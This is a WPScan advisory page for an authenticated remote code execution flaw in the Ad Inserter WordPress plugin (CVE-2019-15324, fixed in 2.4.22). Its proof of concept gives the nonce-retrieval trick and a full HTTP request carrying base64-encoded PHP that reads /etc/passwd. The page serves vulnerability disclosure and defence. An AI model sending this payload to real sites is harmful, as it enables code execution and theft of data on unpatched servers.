WPScan
How it worksPricing
Vulnerabilities
WordPressPluginsThemesStatsSubmit vulnerabilities
For developers
StatusAPI detailsCLI scanner
Contact
WPScan
How it worksPricing
Vulnerabilities
WordPressPluginsThemesStatsSubmit vulnerabilities
For developers
StatusAPI detailsCLI scanner
Contact

WordPress Plugin Vulnerabilities

Ad Inserter <= 2.4.21 - Authenticated Remote Code Execution

Description

The Ad Inserter – Ad Manager & AdSense Ads WordPress plugin was affected by an Authenticated Remote Code Execution security vulnerability.

Proof of Concept

The nonce (ai_check in the final request) can be obtained by querying the homepage with the AI_WP_DEBUGGING cookie set to 2.

Then, use an account with a role as low as subscriber to perform the request (payload below in the code parameter is base64 encoded for <?php echo file_get_contents('/etc/passwd'); ?>:

POST /wp-admin/admin-ajax.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:70.0) Gecko/20100101 Firefox/70.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/wp-admin/index.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 130
Origin: http://127.0.0.1
Connection: close
Cookie: [SNIPPED]
Upgrade-Insecure-Requests: 1

action=ai_ajax_backend&preview=1&ai_check=[SNIPPED]&code=PD9waHAgZWNobyBmaWxlX2dldF9jb250ZW50cygnL2V0Yy9wYXNzd2QnKTsgPz4%3D&php=1 

Affects Plugins

ad-inserter
Fixed in version 2.4.22

References

CVE
CVE-2019-15324
URL
https://www.wordfence.com/blog/2019/07/critical-vulnerability-patched-in-ad-inserter-plugin/
URL
https://plugins.trac.wordpress.org/changeset/2122577/ad-inserter

Classification

Type

RCE

OWASP top 10
A1: Injection
CWE
CWE-94

Miscellaneous

Original Researcher

Sean Murphy (Wordfence)

Submitter

Ryan Dewhurst

Submitter website
https://wpscan.io
Submitter twitter
ethicalhack3r
Verified

No

WPVDB ID
fbfa36dc-7028-4a31-8a68-4b02da80290c

Timeline

Publicly Published

2019-07-15 (about 3 years ago)

Added

2019-07-15 (about 3 years ago)

Last Updated

2020-09-22 (about 2 years ago)

Our Other Services

WPScan WordPress Security Plugin
WPScan

Vulnerabilities

WordPressPluginsThemesOur StatsSubmit vulnerabilities

About

How it worksPricingWordPress pluginNewsContact

For Developers

StatusAPI detailsCLI scanner

Other

PrivacyTerms of serviceSubmission termsDisclosure policyPrivacy Notice for California Users
jetpackIn partnership with Jetpack
githubtwitterfacebook
Angithubendeavor
Work With Us